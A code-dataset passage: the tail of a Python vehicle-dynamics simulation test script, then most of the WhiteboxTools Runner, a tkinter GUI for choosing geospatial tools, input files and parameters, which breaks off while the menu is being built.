inputs = np.zeros([2, n_steps])
time = np.linspace(0, n_steps+1, n_steps+1)*Ts
inputs[1,:] = 0.2
x_init = np.array([0, 0, 0, 3, 0, 0])
x_disc, dxdt_disc = model.sim_discrete(x_init, inputs, Ts)
model.plot_results(time, x_disc, dxdt_disc, inputs)
# start at origin with init velocity [3, 0] m/s
# steer at constant angle 0.2 rad after 2 sec
if test_case == 6:
Ts = 0.02
n_steps = int(8/Ts)
inputs = np.zeros([2, n_steps])
inputs[1,int(n_steps/4):] = 0.2
time = np.linspace(0, n_steps+1, n_steps+1)*Ts
x_init = np.array([0, 0, 0, 3, 0, 0])
x_disc, dxdt_disc = model.sim_discrete(x_init, inputs, Ts)
model.plot_results(time, x_disc, dxdt_disc, inputs) | 29.858268 | 93 | 0.616913 | [
"MIT"
] | KlrShaK/bayesrace | bayes_race/models/dynamic.py | 11,384 | Python |
#!/usr/bin/env python3
# This script is part of the WhiteboxTools geospatial analysis library.
# Authors: Dr. John Lindsay, Rachel Broders
# Created: 28/11/2017
# Last Modified: 05/11/2019
# License: MIT
import __future__
import sys
# if sys.version_info[0] < 3:
# raise Exception("Must be using Python 3")
import json
import os
from os import path
# from __future__ import print_function
# from enum import Enum
import platform
import re #Added by Rachel for snake_to_camel function
from pathlib import Path
import glob
from sys import platform as _platform
import shlex
import tkinter as tk
from tkinter import ttk
from tkinter.scrolledtext import ScrolledText
from tkinter import filedialog
from tkinter import messagebox
from tkinter import PhotoImage
import webbrowser
from whitebox_tools import WhiteboxTools, to_camelcase
wbt = WhiteboxTools()
class FileSelector(tk.Frame):
def __init__(self, json_str, runner, master=None):
# first make sure that the json data has the correct fields
j = json.loads(json_str)
self.name = j['name']
self.description = j['description']
self.flag = j['flags'][len(j['flags']) - 1]
self.parameter_type = j['parameter_type']
self.file_type = ""
if "ExistingFile" in self.parameter_type:
self.file_type = j['parameter_type']['ExistingFile']
elif "NewFile" in self.parameter_type:
self.file_type = j['parameter_type']['NewFile']
self.optional = j['optional']
default_value = j['default_value']
self.runner = runner
ttk.Frame.__init__(self, master, padding='0.02i')
self.grid()
self.label = ttk.Label(self, text=self.name, justify=tk.LEFT)
self.label.grid(row=0, column=0, sticky=tk.W)
self.label.columnconfigure(0, weight=1)
if not self.optional:
self.label['text'] = self.label['text'] + "*"
fs_frame = ttk.Frame(self, padding='0.0i')
self.value = tk.StringVar()
self.entry = ttk.Entry(
fs_frame, width=45, justify=tk.LEFT, textvariable=self.value)
self.entry.grid(row=0, column=0, sticky=tk.NSEW)
self.entry.columnconfigure(0, weight=1)
if default_value:
self.value.set(default_value)
# dir_path = os.path.dirname(os.path.realpath(__file__))
# print(dir_path)
# self.open_file_icon = tk.PhotoImage(file = dir_path + '//img//open.png') #Added by Rachel to replace file selector "..." button with open file icon
# self.open_button = ttk.Button(fs_frame, width=4, image = self.open_file_icon, command=self.select_file, padding = '0.02i')
self.open_button = ttk.Button(fs_frame, width=4, text="...", command=self.select_file, padding = '0.02i')
self.open_button.grid(row=0, column=1, sticky=tk.E)
self.open_button.columnconfigure(0, weight=1)
fs_frame.grid(row=1, column=0, sticky=tk.NSEW)
fs_frame.columnconfigure(0, weight=10)
fs_frame.columnconfigure(1, weight=1)
# self.pack(fill=tk.BOTH, expand=1)
self.columnconfigure(0, weight=1)
self.rowconfigure(0, weight=1)
self.rowconfigure(1, weight=1)
# Add the bindings
if _platform == "darwin":
self.entry.bind("<Command-Key-a>", self.select_all)
else:
self.entry.bind("<Control-Key-a>", self.select_all)
def select_file(self):
try:
result = self.value.get()
if self.parameter_type == "Directory":
result = filedialog.askdirectory(initialdir=self.runner.working_dir, title="Select directory")
elif "ExistingFile" in self.parameter_type:
ftypes = [('All files', '*.*')]
if 'RasterAndVector' in self.file_type:
ftypes = [("Shapefiles", "*.shp"), ('Raster files', ('*.dep', '*.tif',
'*.tiff', '*.bil', '*.flt',
'*.sdat', '*.rdc',
'*.asc'))]
elif 'Raster' in self.file_type:
ftypes = [('Raster files', ('*.dep', '*.tif',
'*.tiff', '*.bil', '*.flt',
'*.sdat', '*.rdc',
'*.asc'))]
elif 'Lidar' in self.file_type:
ftypes = [("LiDAR files", ('*.las', '*.zlidar', '*.laz', '*.zip'))]
elif 'Vector' in self.file_type:
ftypes = [("Shapefiles", "*.shp")]
elif 'Text' in self.file_type:
ftypes = [("Text files", "*.txt"), ("all files", "*.*")]
elif 'Csv' in self.file_type:
ftypes = [("CSC files", "*.csv"), ("all files", "*.*")]
elif 'Html' in self.file_type:
ftypes = [("HTML files", "*.html")]
result = filedialog.askopenfilename(
initialdir=self.runner.working_dir, title="Select file", filetypes=ftypes)
elif "NewFile" in self.parameter_type:
result = filedialog.asksaveasfilename()
self.value.set(result)
# update the working directory
self.runner.working_dir = os.path.dirname(result)
except:
t = "file"
if self.parameter_type == "Directory":
t = "directory"
messagebox.showinfo("Warning", "Could not find {}".format(t))
def get_value(self):
if self.value.get():
v = self.value.get()
# Do some quality assurance here.
# Is there a directory included?
if not path.dirname(v):
v = path.join(self.runner.working_dir, v)
# What about a file extension?
ext = os.path.splitext(v)[-1].lower().strip()
if not ext:
ext = ""
if 'RasterAndVector' in self.file_type:
ext = '.tif'
elif 'Raster' in self.file_type:
ext = '.tif'
elif 'Lidar' in self.file_type:
ext = '.las'
elif 'Vector' in self.file_type:
ext = '.shp'
elif 'Text' in self.file_type:
ext = '.txt'
elif 'Csv' in self.file_type:
ext = '.csv'
elif 'Html' in self.file_type:
ext = '.html'
v += ext
v = path.normpath(v)
return "{}='{}'".format(self.flag, v)
else:
t = "file"
if self.parameter_type == "Directory":
t = "directory"
if not self.optional:
messagebox.showinfo(
"Error", "Unspecified {} parameter {}.".format(t, self.flag))
return None
def select_all(self, event):
self.entry.select_range(0, tk.END)
return 'break'
class FileOrFloat(tk.Frame):
def __init__(self, json_str, runner, master=None):
# first make sure that the json data has the correct fields
j = json.loads(json_str)
self.name = j['name']
self.description = j['description']
self.flag = j['flags'][len(j['flags']) - 1]
self.parameter_type = j['parameter_type']
self.file_type = j['parameter_type']['ExistingFileOrFloat']
self.optional = j['optional']
default_value = j['default_value']
self.runner = runner
ttk.Frame.__init__(self, master)
self.grid()
self['padding'] = '0.02i'
self.label = ttk.Label(self, text=self.name, justify=tk.LEFT)
self.label.grid(row=0, column=0, sticky=tk.W)
self.label.columnconfigure(0, weight=1)
if not self.optional:
self.label['text'] = self.label['text'] + "*"
fs_frame = ttk.Frame(self, padding='0.0i')
self.value = tk.StringVar()
self.entry = ttk.Entry(
fs_frame, width=35, justify=tk.LEFT, textvariable=self.value)
self.entry.grid(row=0, column=0, sticky=tk.NSEW)
self.entry.columnconfigure(0, weight=1)
if default_value:
self.value.set(default_value)
# self.img = tk.PhotoImage(file=script_dir + "/img/open.gif")
# self.open_button = ttk.Button(fs_frame, width=55, image=self.img, command=self.select_dir)
self.open_button = ttk.Button(
fs_frame, width=4, text="...", command=self.select_file)
self.open_button.grid(row=0, column=1, sticky=tk.E)
# self.open_button.columnconfigure(0, weight=1)
self.label = ttk.Label(fs_frame, text='OR', justify=tk.LEFT)
self.label.grid(row=0, column=2, sticky=tk.W)
# self.label.columnconfigure(0, weight=1)
self.value2 = tk.StringVar()
self.entry2 = ttk.Entry(
fs_frame, width=10, justify=tk.LEFT, textvariable=self.value2)
self.entry2.grid(row=0, column=3, sticky=tk.NSEW)
self.entry2.columnconfigure(0, weight=1)
self.entry2['justify'] = 'right'
fs_frame.grid(row=1, column=0, sticky=tk.NSEW)
fs_frame.columnconfigure(0, weight=10)
fs_frame.columnconfigure(1, weight=1)
# self.pack(fill=tk.BOTH, expand=1)
self.columnconfigure(0, weight=1)
self.rowconfigure(0, weight=1)
self.rowconfigure(1, weight=1)
# Add the bindings
if _platform == "darwin":
self.entry.bind("<Command-Key-a>", self.select_all)
else:
self.entry.bind("<Control-Key-a>", self.select_all)
def select_file(self):
try:
result = self.value.get()
ftypes = [('All files', '*.*')]
if 'RasterAndVector' in self.file_type:
ftypes = [("Shapefiles", "*.shp"), ('Raster files', ('*.dep', '*.tif',
'*.tiff', '*.bil', '*.flt',
'*.sdat', '*.rdc',
'*.asc'))]
elif 'Raster' in self.file_type:
ftypes = [('Raster files', ('*.dep', '*.tif',
'*.tiff', '*.bil', '*.flt',
'*.sdat', '*.rdc',
'*.asc'))]
elif 'Lidar' in self.file_type:
ftypes = [("LiDAR files", ('*.las', '*.zlidar', '*.laz', '*.zip'))]
elif 'Vector' in self.file_type:
ftypes = [("Shapefiles", "*.shp")]
elif 'Text' in self.file_type:
ftypes = [("Text files", "*.txt"), ("all files", "*.*")]
elif 'Csv' in self.file_type:
ftypes = [("CSC files", "*.csv"), ("all files", "*.*")]
elif 'Html' in self.file_type:
ftypes = [("HTML files", "*.html")]
result = filedialog.askopenfilename(
initialdir=self.runner.working_dir, title="Select file", filetypes=ftypes)
self.value.set(result)
# update the working directory
self.runner.working_dir = os.path.dirname(result)
except:
t = "file"
if self.parameter_type == "Directory":
t = "directory"
messagebox.showinfo("Warning", "Could not find {}".format(t))
def RepresentsFloat(self, s):
try:
float(s)
return True
except ValueError:
return False
def get_value(self):
if self.value.get():
v = self.value.get()
# Do some quality assurance here.
# Is there a directory included?
if not path.dirname(v):
v = path.join(self.runner.working_dir, v)
# What about a file extension?
ext = os.path.splitext(v)[-1].lower()
if not ext:
ext = ""
if 'RasterAndVector' in self.file_type:
ext = '.tif'
elif 'Raster' in self.file_type:
ext = '.tif'
elif 'Lidar' in self.file_type:
ext = '.las'
elif 'Vector' in self.file_type:
ext = '.shp'
elif 'Text' in self.file_type:
ext = '.txt'
elif 'Csv' in self.file_type:
ext = '.csv'
elif 'Html' in self.file_type:
ext = '.html'
v = v + ext
v = path.normpath(v)
return "{}='{}'".format(self.flag, v)
elif self.value2.get():
v = self.value2.get()
if self.RepresentsFloat(v):
return "{}={}".format(self.flag, v)
else:
messagebox.showinfo(
"Error", "Error converting parameter {} to type Float.".format(self.flag))
else:
if not self.optional:
messagebox.showinfo(
"Error", "Unspecified file/numeric parameter {}.".format(self.flag))
return None
def select_all(self, event):
self.entry.select_range(0, tk.END)
return 'break'
class MultifileSelector(tk.Frame):
def __init__(self, json_str, runner, master=None):
# first make sure that the json data has the correct fields
j = json.loads(json_str)
self.name = j['name']
self.description = j['description']
self.flag = j['flags'][len(j['flags']) - 1]
self.parameter_type = j['parameter_type']
self.file_type = ""
self.file_type = j['parameter_type']['FileList']
self.optional = j['optional']
default_value = j['default_value']
self.runner = runner
ttk.Frame.__init__(self, master)
self.grid()
self['padding'] = '0.05i'
self.label = ttk.Label(self, text=self.name, justify=tk.LEFT)
self.label.grid(row=0, column=0, sticky=tk.W)
self.label.columnconfigure(0, weight=1)
if not self.optional:
self.label['text'] = self.label['text'] + "*"
fs_frame = ttk.Frame(self, padding='0.0i')
# , variable=self.value)
self.opt = tk.Listbox(fs_frame, width=44, height=4)
self.opt.grid(row=0, column=0, sticky=tk.NSEW)
s = ttk.Scrollbar(fs_frame, orient=tk.VERTICAL, command=self.opt.yview)
s.grid(row=0, column=1, sticky=(tk.N, tk.S))
self.opt['yscrollcommand'] = s.set
btn_frame = ttk.Frame(fs_frame, padding='0.0i')
self.open_button = ttk.Button(
btn_frame, width=4, text="...", command=self.select_file)
self.open_button.grid(row=0, column=0, sticky=tk.NE)
self.open_button.columnconfigure(0, weight=1)
self.open_button.rowconfigure(0, weight=1)
self.delete_button = ttk.Button(
btn_frame, width=4, text="del", command=self.delete_entry)
self.delete_button.grid(row=1, column=0, sticky=tk.NE)
self.delete_button.columnconfigure(0, weight=1)
self.delete_button.rowconfigure(1, weight=1)
btn_frame.grid(row=0, column=2, sticky=tk.NE)
fs_frame.grid(row=1, column=0, sticky=tk.NSEW)
fs_frame.columnconfigure(0, weight=10)
fs_frame.columnconfigure(1, weight=1)
fs_frame.columnconfigure(2, weight=1)
# self.pack(fill=tk.BOTH, expand=1)
self.columnconfigure(0, weight=1)
self.rowconfigure(0, weight=1)
self.rowconfigure(1, weight=1)
def select_file(self):
try:
#result = self.value.get()
init_dir = self.runner.working_dir
ftypes = [('All files', '*.*')]
if 'RasterAndVector' in self.file_type:
ftypes = [("Shapefiles", "*.shp"), ('Raster files', ('*.dep', '*.tif',
'*.tiff', '*.bil', '*.flt',
'*.sdat', '*.rdc',
'*.asc'))]
elif 'Raster' in self.file_type:
ftypes = [('Raster files', ('*.dep', '*.tif',
'*.tiff', '*.bil', '*.flt',
'*.sdat', '*.rdc',
'*.asc'))]
elif 'Lidar' in self.file_type:
ftypes = [("LiDAR files", ('*.las', '*.zlidar', '*.laz', '*.zip'))]
elif 'Vector' in self.file_type:
ftypes = [("Shapefiles", "*.shp")]
elif 'Text' in self.file_type:
ftypes = [("Text files", "*.txt"), ("all files", "*.*")]
elif 'Csv' in self.file_type:
ftypes = [("CSC files", "*.csv"), ("all files", "*.*")]
elif 'Html' in self.file_type:
ftypes = [("HTML files", "*.html")]
result = filedialog.askopenfilenames(
initialdir=init_dir, title="Select files", filetypes=ftypes)
if result:
for v in result:
self.opt.insert(tk.END, v)
# update the working directory
self.runner.working_dir = os.path.dirname(result[0])
except:
messagebox.showinfo("Warning", "Could not find file")
def delete_entry(self):
self.opt.delete(tk.ANCHOR)
def get_value(self):
try:
l = self.opt.get(0, tk.END)
if l:
s = ""
for i in range(0, len(l)):
v = l[i]
if not path.dirname(v):
v = path.join(self.runner.working_dir, v)
v = path.normpath(v)
if i < len(l) - 1:
s += "{};".format(v)
else:
s += "{}".format(v)
return "{}='{}'".format(self.flag, s)
else:
if not self.optional:
messagebox.showinfo(
"Error", "Unspecified non-optional parameter {}.".format(self.flag))
except:
messagebox.showinfo(
"Error", "Error formating files for parameter {}".format(self.flag))
return None
class BooleanInput(tk.Frame):
def __init__(self, json_str, master=None):
# first make sure that the json data has the correct fields
j = json.loads(json_str)
self.name = j['name']
self.description = j['description']
self.flag = j['flags'][len(j['flags']) - 1]
self.parameter_type = j['parameter_type']
# just for quality control. BooleanInputs are always optional.
self.optional = True
default_value = j['default_value']
ttk.Frame.__init__(self, master)
self.grid()
self['padding'] = '0.05i'
frame = ttk.Frame(self, padding='0.0i')
self.value = tk.IntVar()
c = ttk.Checkbutton(frame, text=self.name,
width=55, variable=self.value)
c.grid(row=0, column=0, sticky=tk.W)
# set the default value
if j['default_value'] != None and j['default_value'] != 'false':
self.value.set(1)
else:
self.value.set(0)
frame.grid(row=1, column=0, sticky=tk.W)
frame.columnconfigure(0, weight=1)
# self.pack(fill=tk.BOTH, expand=1)
self.columnconfigure(0, weight=1)
self.rowconfigure(0, weight=1)
def get_value(self):
if self.value.get() == 1:
return self.flag
else:
return None
class OptionsInput(tk.Frame):
def __init__(self, json_str, master=None):
# first make sure that the json data has the correct fields
j = json.loads(json_str)
self.name = j['name']
self.description = j['description']
self.flag = j['flags'][len(j['flags']) - 1]
self.parameter_type = j['parameter_type']
self.optional = j['optional']
default_value = j['default_value']
ttk.Frame.__init__(self, master)
self.grid()
self['padding'] = '0.02i'
frame = ttk.Frame(self, padding='0.0i')
self.label = ttk.Label(self, text=self.name, justify=tk.LEFT)
self.label.grid(row=0, column=0, sticky=tk.W)
self.label.columnconfigure(0, weight=1)
frame2 = ttk.Frame(frame, padding='0.0i')
opt = ttk.Combobox(frame2, width=40)
opt.grid(row=0, column=0, sticky=tk.NSEW)
self.value = None # initialize in event of no default and no selection
i = 1
default_index = -1
list = j['parameter_type']['OptionList']
values = ()
for v in list:
values += (v,)
# opt.insert(tk.END, v)
if v == default_value:
default_index = i - 1
i = i + 1
opt['values'] = values
# opt.bind("<<ComboboxSelect>>", self.select)
opt.bind("<<ComboboxSelected>>", self.select)
if default_index >= 0:
opt.current(default_index)
opt.event_generate("<<ComboboxSelected>>")
# opt.see(default_index)
frame2.grid(row=0, column=0, sticky=tk.W)
frame.grid(row=1, column=0, sticky=tk.W)
frame.columnconfigure(0, weight=1)
# self.pack(fill=tk.BOTH, expand=1)
self.columnconfigure(0, weight=1)
self.rowconfigure(0, weight=1)
# # first make sure that the json data has the correct fields
# j = json.loads(json_str)
# self.name = j['name']
# self.description = j['description']
# self.flag = j['flags'][len(j['flags']) - 1]
# self.parameter_type = j['parameter_type']
# self.optional = j['optional']
# default_value = j['default_value']
# ttk.Frame.__init__(self, master)
# self.grid()
# self['padding'] = '0.1i'
# frame = ttk.Frame(self, padding='0.0i')
# self.label = ttk.Label(self, text=self.name, justify=tk.LEFT)
# self.label.grid(row=0, column=0, sticky=tk.W)
# self.label.columnconfigure(0, weight=1)
# frame2 = ttk.Frame(frame, padding='0.0i')
# opt = tk.Listbox(frame2, width=40) # , variable=self.value)
# opt.grid(row=0, column=0, sticky=tk.NSEW)
# s = ttk.Scrollbar(frame2, orient=tk.VERTICAL, command=opt.yview)
# s.grid(row=0, column=1, sticky=(tk.N, tk.S))
# opt['yscrollcommand'] = s.set
# self.value = None # initialize in event of no default and no selection
# i = 1
# default_index = -1
# list = j['parameter_type']['OptionList']
# for v in list:
# #opt.insert(i, v)
# opt.insert(tk.END, v)
# if v == default_value:
# default_index = i - 1
# i = i + 1
# if i - 1 < 4:
# opt['height'] = i - 1
# else:
# opt['height'] = 3
# opt.bind("<<ListboxSelect>>", self.select)
# if default_index >= 0:
# opt.select_set(default_index)
# opt.event_generate("<<ListboxSelect>>")
# opt.see(default_index)
# frame2.grid(row=0, column=0, sticky=tk.W)
# frame.grid(row=1, column=0, sticky=tk.W)
# frame.columnconfigure(0, weight=1)
# # self.pack(fill=tk.BOTH, expand=1)
# self.columnconfigure(0, weight=1)
# self.rowconfigure(0, weight=1)
def get_value(self):
if self.value:
return "{}='{}'".format(self.flag, self.value)
else:
if not self.optional:
messagebox.showinfo(
"Error", "Unspecified non-optional parameter {}.".format(self.flag))
return None
def select(self, event):
widget = event.widget
# selection = widget.curselection()
self.value = widget.get() # selection[0])
class DataInput(tk.Frame):
def __init__(self, json_str, master=None):
# first make sure that the json data has the correct fields
j = json.loads(json_str)
self.name = j['name']
self.description = j['description']
self.flag = j['flags'][len(j['flags']) - 1]
self.parameter_type = j['parameter_type']
self.optional = j['optional']
default_value = j['default_value']
ttk.Frame.__init__(self, master)
self.grid()
self['padding'] = '0.1i'
self.label = ttk.Label(self, text=self.name, justify=tk.LEFT)
self.label.grid(row=0, column=0, sticky=tk.W)
self.label.columnconfigure(0, weight=1)
self.value = tk.StringVar()
if default_value:
self.value.set(default_value)
else:
self.value.set("")
self.entry = ttk.Entry(self, justify=tk.LEFT, textvariable=self.value)
self.entry.grid(row=0, column=1, sticky=tk.NSEW)
self.entry.columnconfigure(1, weight=10)
if not self.optional:
self.label['text'] = self.label['text'] + "*"
if ("Integer" in self.parameter_type or
"Float" in self.parameter_type or
"Double" in self.parameter_type):
self.entry['justify'] = 'right'
# Add the bindings
if _platform == "darwin":
self.entry.bind("<Command-Key-a>", self.select_all)
else:
self.entry.bind("<Control-Key-a>", self.select_all)
# self.pack(fill=tk.BOTH, expand=1)
self.columnconfigure(0, weight=1)
self.columnconfigure(1, weight=10)
self.rowconfigure(0, weight=1)
def RepresentsInt(self, s):
try:
int(s)
return True
except ValueError:
return False
def RepresentsFloat(self, s):
try:
float(s)
return True
except ValueError:
return False
def get_value(self):
v = self.value.get()
if v:
if "Integer" in self.parameter_type:
if self.RepresentsInt(self.value.get()):
return "{}={}".format(self.flag, self.value.get())
else:
messagebox.showinfo(
"Error", "Error converting parameter {} to type Integer.".format(self.flag))
elif "Float" in self.parameter_type:
if self.RepresentsFloat(self.value.get()):
return "{}={}".format(self.flag, self.value.get())
else:
messagebox.showinfo(
"Error", "Error converting parameter {} to type Float.".format(self.flag))
elif "Double" in self.parameter_type:
if self.RepresentsFloat(self.value.get()):
return "{}={}".format(self.flag, self.value.get())
else:
messagebox.showinfo(
"Error", "Error converting parameter {} to type Double.".format(self.flag))
else: # String or StringOrNumber types
return "{}='{}'".format(self.flag, self.value.get())
else:
if not self.optional:
messagebox.showinfo(
"Error", "Unspecified non-optional parameter {}.".format(self.flag))
return None
def select_all(self, event):
self.entry.select_range(0, tk.END)
return 'break'
class WbRunner(tk.Frame):
def __init__(self, tool_name=None, master=None):
if platform.system() == 'Windows':
self.ext = '.exe'
else:
self.ext = ''
exe_name = "whitebox_tools{}".format(self.ext)
self.exe_path = path.dirname(path.abspath(__file__))
os.chdir(self.exe_path)
for filename in glob.iglob('**/*', recursive=True):
if filename.endswith(exe_name):
self.exe_path = path.dirname(path.abspath(filename))
break
wbt.set_whitebox_dir(self.exe_path)
ttk.Frame.__init__(self, master)
self.script_dir = os.path.dirname(os.path.realpath(__file__))
self.grid()
self.tool_name = tool_name
self.master.title("WhiteboxTools Runner")
if _platform == "darwin":
os.system(
'''/usr/bin/osascript -e 'tell app "Finder" to set frontmost of process "Python" to true' ''')
self.create_widgets()
self.working_dir = str(Path.home())
def create_widgets(self):
#########################################################
# Overall/Top level Frame #
#########################################################
#define left-side frame (toplevel_frame) and right-side frame (overall_frame)
toplevel_frame = ttk.Frame(self, padding='0.1i')
overall_frame = ttk.Frame(self, padding='0.1i')
#set-up layout
overall_frame.grid(row=0, column=1, sticky=tk.NSEW)
toplevel_frame.grid(row=0, column=0, sticky=tk.NSEW)
#########################################################
# Calling basics #
#########################################################
#Create all needed lists of tools and toolboxes
self.toolbox_list = self.get_toolboxes()
self.sort_toolboxes()
self.tools_and_toolboxes = wbt.toolbox('')
self.sort_tools_by_toolbox()
self.get_tools_list()
#Icons to be used in tool treeview
self.tool_icon = tk.PhotoImage(file = self.script_dir + '//img//tool.gif')
self.open_toolbox_icon = tk.PhotoImage(file = self.script_dir + '//img//open.gif')
self.closed_toolbox_icon = tk.PhotoImage(file = self.script_dir + '//img//closed.gif')
#########################################################
# Toolboxes Frame # FIXME: change width or make horizontally scrollable
#########################################################
#define tools_frame and tool_tree
self.tools_frame = ttk.LabelFrame(toplevel_frame, text="{} Available Tools".format(len(self.tools_list)), padding='0.1i')
self.tool_tree = ttk.Treeview(self.tools_frame, height = 21)
#Set up layout
self.tool_tree.grid(row=0, column=0, sticky=tk.NSEW)
self.tool_tree.column("#0", width = 280) #Set width so all tools are readable within the frame
self.tools_frame.grid(row=0, column=0, sticky=tk.NSEW)
self.tools_frame.columnconfigure(0, weight=10)
self.tools_frame.columnconfigure(1, weight=1)
self.tools_frame.rowconfigure(0, weight=10)
self.tools_frame.rowconfigure(1, weight=1)
#Add toolboxes and tools to treeview
index = 0
for toolbox in self.lower_toolboxes:
if toolbox.find('/') != (-1): #toolboxes
self.tool_tree.insert(toolbox[:toolbox.find('/')], 0, text = " " + toolbox[toolbox.find('/') + 1:], iid = toolbox[toolbox.find('/') + 1:], tags = 'toolbox', image = self.closed_toolbox_icon)
for tool in self.sorted_tools[index]: #add tools within toolbox
self.tool_tree.insert(toolbox[toolbox.find('/') + 1:], 'end', text = " " + tool, tags = 'tool', iid = tool, image = self.tool_icon)
else: #subtoolboxes
self.tool_tree.insert('', 'end', text = " " + toolbox, iid = toolbox, tags = 'toolbox', image = self.closed_toolbox_icon)
for tool in self.sorted_tools[index]: #add tools within subtoolbox
self.tool_tree.insert(toolbox, 'end', text = " " + tool, iid = tool, tags = 'tool', image = self.tool_icon)
index = index + 1
#bind tools in treeview to self.tree_update_tool_help function and toolboxes to self.update_toolbox_icon function
self.tool_tree.tag_bind('tool', "<<TreeviewSelect>>", self.tree_update_tool_help)
self.tool_tree.tag_bind('toolbox', "<<TreeviewSelect>>", self.update_toolbox_icon)
#Add vertical scrollbar to treeview frame
s = ttk.Scrollbar(self.tools_frame, orient=tk.VERTICAL,command=self.tool_tree.yview)
s.grid(row=0, column=1, sticky=(tk.N, tk.S))
self.tool_tree['yscrollcommand'] = s.set
#########################################################
# Search Bar #
#########################################################
#create variables for search results and search input
self.search_list = []
self.search_text = tk.StringVar()
#Create the elements of the search frame
self.search_frame = ttk.LabelFrame(toplevel_frame, padding='0.1i', text="{} Tools Found".format(len(self.search_list)))
self.search_label = ttk.Label(self.search_frame, text = "Search: ")
self.search_bar = ttk.Entry(self.search_frame, width = 30, textvariable = self.search_text)
self.search_results_listbox = tk.Listbox(self.search_frame, height=11)
self.search_scroll = ttk.Scrollbar(self.search_frame, orient=tk.VERTICAL, command=self.search_results_listbox.yview)
self.search_results_listbox['yscrollcommand'] = self.search_scroll.set
#Add bindings
self.search_results_listbox.bind("<<ListboxSelect>>", self.search_update_tool_help)
self.search_bar.bind('<Return>', self.update_search)
#Define layout of the frame
self.search_frame.grid(row = 1, column = 0, sticky=tk.NSEW)
self.search_label.grid(row = 0, column = 0, sticky=tk.NW)
self.search_bar.grid(row = 0, column = 1, sticky=tk.NE)
self.search_results_listbox.grid(row = 1, column = 0, columnspan = 2, sticky=tk.NSEW, pady = 5)
self.search_scroll.grid(row=1, column=2, sticky=(tk.N, tk.S))
#Configure rows and columns of the frame
self.search_frame.columnconfigure(0, weight=1)
self.search_frame.columnconfigure(1, weight=10)
self.search_frame.columnconfigure(1, weight=1)
self.search_frame.rowconfigure(0, weight=1)
self.search_frame.rowconfigure(1, weight = 10)
#########################################################
# Current Tool Frame #
#########################################################
#Create the elements of the current tool frame
self.current_tool_frame = ttk.Frame(overall_frame, padding='0.01i')
self.current_tool_lbl = ttk.Label(self.current_tool_frame, text="Current Tool: {}".format(self.tool_name), justify=tk.LEFT) # , font=("Helvetica", 12, "bold")
self.view_code_button = ttk.Button(self.current_tool_frame, text="View Code", width=12, command=self.view_code)
#Define layout of the frame
self.view_code_button.grid(row=0, column=1, sticky=tk.E)
self.current_tool_lbl.grid(row=0, column=0, sticky=tk.W)
self.current_tool_frame.grid(row=0, column=0, columnspan = 2, sticky=tk.NSEW)
#Configure rows and columns of the frame
self.current_tool_frame.columnconfigure(0, weight=1)
self.current_tool_frame.columnconfigure(1, weight=1)
#########################################################
# Args Frame #
#########################################################
# #Create the elements of the tool arguments frame
# self.arg_scroll = ttk.Scrollbar(overall_frame, orient='vertical')
# self.arg_canvas = tk.Canvas(overall_frame, bd=0, highlightthickness=0, yscrollcommand=self.arg_scroll.set)
# self.arg_scroll.config(command=self.arg_canvas.yview) #self.arg_scroll scrolls over self.arg_canvas
# self.arg_scroll_frame = ttk.Frame(self.arg_canvas) # create a frame inside the self.arg_canvas which will be scrolled with it
# self.arg_scroll_frame_id = self.arg_canvas.create_window(0, 0, window=self.arg_scroll_frame, anchor="nw")
# #Define layout of the frame
# self.arg_scroll.grid(row = 1, column = 1, sticky = (tk.NS, tk.E))
# self.arg_canvas.grid(row = 1, column = 0, sticky = tk.NSEW)
# # reset the view
# self.arg_canvas.xview_moveto(0)
# self.arg_canvas.yview_moveto(0)
# #Add bindings
# self.arg_scroll_frame.bind('<Configure>', self.configure_arg_scroll_frame)
# self.arg_canvas.bind('<Configure>', self.configure_arg_canvas)
self.arg_scroll_frame = ttk.Frame(overall_frame, padding='0.0i')
self.arg_scroll_frame.grid(row=1, column=0, sticky=tk.NSEW)
self.arg_scroll_frame.columnconfigure(0, weight=1)
#########################################################
# Buttons Frame #
#########################################################
#Create the elements of the buttons frame
buttons_frame = ttk.Frame(overall_frame, padding='0.1i')
self.run_button = ttk.Button(buttons_frame, text="Run", width=8, command=self.run_tool)
self.quit_button = ttk.Button(buttons_frame, text="Cancel", width=8, command=self.cancel_operation)
self.help_button = ttk.Button(buttons_frame, text="Help", width=8, command=self.tool_help_button)
#Define layout of the frame
self.run_button.grid(row=0, column=0)
self.quit_button.grid(row=0, column=1)
self.help_button.grid(row = 0, column = 2)
buttons_frame.grid(row=2, column=0, columnspan = 2, sticky=tk.E)
#########################################################
# Output Frame #
#########################################################
#Create the elements of the output frame
output_frame = ttk.Frame(overall_frame)
outlabel = ttk.Label(output_frame, text="Output:", justify=tk.LEFT)
self.out_text = ScrolledText(output_frame, width=63, height=15, wrap=tk.NONE, padx=7, pady=7, exportselection = 0)
output_scrollbar = ttk.Scrollbar(output_frame, orient=tk.HORIZONTAL, command = self.out_text.xview)
self.out_text['xscrollcommand'] = output_scrollbar.set
#Retreive and insert the text for the current tool
k = wbt.tool_help(self.tool_name)
self.out_text.insert(tk.END, k)
#Define layout of the frame
outlabel.grid(row=0, column=0, sticky=tk.NW)
self.out_text.grid(row=1, column=0, sticky=tk.NSEW)
output_frame.grid(row=3, column=0, columnspan = 2, sticky=(tk.NS, tk.E))
output_scrollbar.grid(row=2, column=0, sticky=(tk.W, tk.E))
#Configure rows and columns of the frame
self.out_text.columnconfigure(0, weight=1)
output_frame.columnconfigure(0, weight=1)
# Add the binding
if _platform == "darwin":
self.out_text.bind("<Command-Key-a>", self.select_all)
else:
self.out_text.bind("<Control-Key-a>", self.select_all)
#########################################################
# Progress Frame #
#########################################################
#Create the elements of the progress frame
progress_frame = ttk.Frame(overall_frame, padding='0.1i')
self.progress_label = ttk.Label(progress_frame, text="Progress:", justify=tk.LEFT)
self.progress_var = tk.DoubleVar()
self.progress = ttk.Progressbar(progress_frame, orient="horizontal", variable=self.progress_var, length=200, maximum=100)
#Define layout of the frame
self.progress_label.grid(row=0, column=0, sticky=tk.E, padx=5)
self.progress.grid(row=0, column=1, sticky=tk.E)
progress_frame.grid(row=4, column=0, columnspan = 2, sticky=tk.SE)
#########################################################
# Tool Selection #
#########################################################
# Select the appropriate tool, if specified, otherwise the first tool
self.tool_tree.focus(self.tool_name)
self.tool_tree.selection_set(self.tool_name)
self.tool_tree.event_generate("<<TreeviewSelect>>")
#########################################################
# Menus #
#########################################################
menubar = tk.Menu(self)
self.filemenu = tk.Menu(menubar, tearoff=0)
self.filemenu.add_command(label="Set Working Directory", command=self.set_directory)
self.filemenu.add_command(label="Locate WhiteboxTools exe", command=self.select_exe)
